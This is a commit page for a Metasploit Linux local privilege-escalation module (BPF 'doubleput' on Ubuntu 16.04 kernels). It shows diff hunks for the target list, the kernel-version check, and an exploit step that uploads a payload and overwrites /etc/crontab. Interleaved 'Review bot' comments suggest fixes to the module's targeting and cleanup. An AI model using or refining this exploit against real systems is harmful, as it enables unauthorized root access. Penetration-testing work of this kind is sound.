
Land #12760, improvements to linux/local/bpf_priv_esc module

busterb committed Dec 26, 2019
2 parents 4de482f + a7b6355 commit 8061cdf97420a98451dc5f0ca72aae4f8ee5a1ff
@@ -7,16 +7,16 @@
The target system must be compiled with `CONFIG_BPF_SYSCALL`
and must not have `kernel.unprivileged_bpf_disabled` set to 1.

Note, this module will overwrite the first few lines
of `/etc/crontab` with a new cron job. The job will
need to be manually removed.


## Vulnerable Application

This module has been tested successfully on:

* Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel)
* Ubuntu 16.04 (x64) kernel 4.4.0-38-generic
* Ubuntu 16.04 (x64) kernel 4.4.0-42-generic
* Ubuntu 16.04 (x64) kernel 4.4.0-98-generic
* Ubuntu 16.04 (x64) kernel 4.4.0-140-generic

This module was not tested against, but may work against:

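Review bot: the "tested successfully" list now includes Ubuntu 16.04 kernels 4.4.0-38, -42, -98 and -140, but the `check` method in this same commit returns `CheckCode::Safe` for any Ubuntu `4.4.0-N` release with `N > 21`, so the module would refuse to run on four of the five kernels this documentation claims it succeeds on. Either the list belongs under "This module was not tested against, but may work against:" or the `> 21` cutoff in `check` is wrong; the two should agree, and the exact behaviour (e.g. "exploit succeeds but check reports Safe") should be written down here.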
@@ -24,13 +24,12 @@ def initialize(info = {})
The target system must be compiled with `CONFIG_BPF_SYSCALL`
and must not have `kernel.unprivileged_bpf_disabled` set to 1.
This module has been tested successfully on:
Note, this module will overwrite the first few lines
of `/etc/crontab` with a new cron job. The job will
need to be manually removed.
Ubuntu 16.04 (x64) kernel 4.4.0-21-generic (default kernel);
Ubuntu 16.04 (x64) kernel 4.4.0-38-generic;
Ubuntu 16.04 (x64) kernel 4.4.0-42-generic;
Ubuntu 16.04 (x64) kernel 4.4.0-98-generic;
Ubuntu 16.04 (x64) kernel 4.4.0-140-generic.
This module has been tested successfully on Ubuntu 16.04 (x64)
kernel 4.4.0-21-generic (default kernel).
},
'License' => MSF_LICENSE,
'Author' =>
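Review bot: the crontab warning was inserted between "This module has been tested successfully on:" and the kernel list it introduces, so the description reads as if the `/etc/crontab` note were the first tested target. Move the three "Note, this module will overwrite ..." lines above "This module has been tested successfully on:" so the list follows its heading directly, matching the order used in the markdown documentation.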
@@ -176,12 +175,21 @@ def upload_and_compile(path, data, gcc_args='')

def check
release = kernel_release
version = kernel_version

if Gem::Version.new(release.split('-').first) < Gem::Version.new('4.4') ||
Gem::Version.new(release.split('-').first) >= Gem::Version.new('4.5.5')
vprint_error "Kernel version #{release} is not vulnerable"
Gem::Version.new(release.split('-').first) > Gem::Version.new('4.5.5')
vprint_error "Kernel version #{release} #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"

if version.downcase.include?('ubuntu') && release =~ /^4\.4\.0-(\d+)-/
if $1.to_i > 21
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
end
vprint_good "Kernel version #{release} #{version} appears to be vulnerable"

lib = cmd_exec('dpkg --get-selections | grep ^fuse').to_s
unless lib.include?('install')
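Review bot: the upper bound changed from `>= Gem::Version.new('4.5.5')` to `> Gem::Version.new('4.5.5')`, which now classifies a 4.5.5 kernel as vulnerable, but nothing in the hunk or the commit message says why; if 4.5.5 is meant to be in range, add a comment citing the fix commit, otherwise keep `>=`. Separately, the description states that the target "must not have `kernel.unprivileged_bpf_disabled` set to 1", yet `check` never reads that sysctl; reading `/proc/sys/kernel/unprivileged_bpf_disabled` (or `sysctl -n kernel.unprivileged_bpf_disabled`) and returning `CheckCode::Safe` when it is `1` would make the documented precondition enforceable. Also note that `$1` is only valid immediately after the `=~` on the previous line; if anything is later inserted between the match and `$1.to_i`, the value silently changes, so capturing the match into a local is safer.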
@@ -516,6 +524,7 @@ def exploit
upload_and_chmodx(payload_path, generate_payload_exe)

print_status('Launching exploit. This may take up to 120 seconds.')
print_warning('This module adds a job to /etc/crontab which requires manual removal!')

register_dir_for_cleanup "#{base_dir}/fuse_mount"
cmd_exec "cd #{base_dir}; #{doubleput_path} & echo "
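Review bot: the new `print_warning` tells the operator that `/etc/crontab` needs manual cleanup, but the module still only registers `#{base_dir}/fuse_mount` for cleanup and never records what it is about to overwrite. Since the description says the first few lines of `/etc/crontab` are clobbered, read and print (or save to loot) the current contents of `/etc/crontab` before `cmd_exec "cd #{base_dir}; #{doubleput_path} & echo "`, so the operator has the original `SHELL`/`PATH` header and any existing jobs to restore afterwards; the warning alone does not give them that.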
